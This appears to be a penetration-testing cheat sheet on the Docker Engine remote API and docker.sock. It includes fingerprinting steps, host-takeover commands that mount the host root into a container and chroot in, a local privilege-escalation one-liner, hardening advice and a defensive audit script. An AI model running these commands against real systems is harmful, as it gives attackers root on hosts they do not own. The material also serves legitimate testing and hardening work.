Docker API
aka dockerd, docker.sock
Docker Engine remote API on 2375 (or the local docker.sock). Unauthenticated access, or membership of the docker group, means root on the host by mounting / into a container.
Ports
| Port | Proto | Notes |
|---|---|---|
| 2375 | tcp | Docker API (no TLS, unauthenticated) |
| 2376 | tcp | Docker API (TLS) |
Fingerprint
- curl http://<host>:2375/version returns engine info
- Locally: /var/run/docker.sock present and accessible
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /var/run/docker.sock | the local Docker control socket (root-equivalent) | sensitive |
Default / weak creds
none: an exposed 2375 has no authentication at all, so there are no credentials to guess
Service users
membership of the docker group equals root
Exploitation primitives
- Run a container that bind-mounts the host root (-v /:/host) and chroot in for full host access as root
- Same trick locally via docker.sock or the docker group during privesc
Overview
The Docker daemon is root. Anything that can talk to it (an exposed 2375, the docker.sock, or the docker group) can start a privileged container and own the host.
Host takeover
List images on an exposed daemon:
docker -H tcp://<TARGET>:2375 images
Mount the host root and chroot in:
docker -H tcp://<TARGET>:2375 run -v /:/host -it alpine chroot /host sh
Local privesc variant (docker group / socket):
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Hardening
Never expose 2375, require TLS client certs on 2376, and treat docker-group membership as root.
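An added host-audit script (not part of the original cheat sheet) that checks the three hardening points above against constructed sample data: a daemon.json `hosts` list, an /etc/group line for the docker group, and docker.sock permission bits. The sample inputs are constructed; on a real host you would feed it /etc/docker/daemon.json, /etc/group and `os.stat("/var/run/docker.sock").st_mode`.

```python
import json
import stat

# Constructed sample inputs (not taken from a real host): the weak setting
# the page warns about, its hardened counterpart, and a docker group line.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})
GROUP_LINE = "docker:x:999:alice,ci-runner"


def audit_daemon_json(text: str) -> list:
    """Flag TCP API listeners that do not require TLS client certificates."""
    cfg = json.loads(text) if text.strip() else {}
    # tlsverify makes dockerd demand a client cert signed by tlscacert
    client_auth = cfg.get("tlsverify") is True
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are gated by file permissions, not the network
        if not client_auth:
            findings.append(f"CRITICAL {host}: TCP API without tlsverify, unauthenticated root on host")
    return findings


def docker_group_members(group_line: str) -> list:
    """Return the users in the docker group from an /etc/group line; each is root-equivalent."""
    name, _pw, _gid, members = group_line.rstrip("\n").split(":", 3)
    if name != "docker" or not members:
        return []
    return members.split(",")


def socket_mode_finding(mode: int) -> str:
    """Classify docker.sock permission bits (pass os.stat(path).st_mode on a live host)."""
    if mode & stat.S_IWOTH:
        return "CRITICAL world-writable docker.sock, any local user is root"
    if mode & stat.S_IWGRP:
        return "INFO group-writable docker.sock, docker group members are root"
    return "OK docker.sock writable by owner only"


if __name__ == "__main__":
    for finding in audit_daemon_json(WEAK_DAEMON_JSON):
        print(finding)
    print("docker group (root-equivalent):", docker_group_members(GROUP_LINE))
    print(socket_mode_finding(0o660))
```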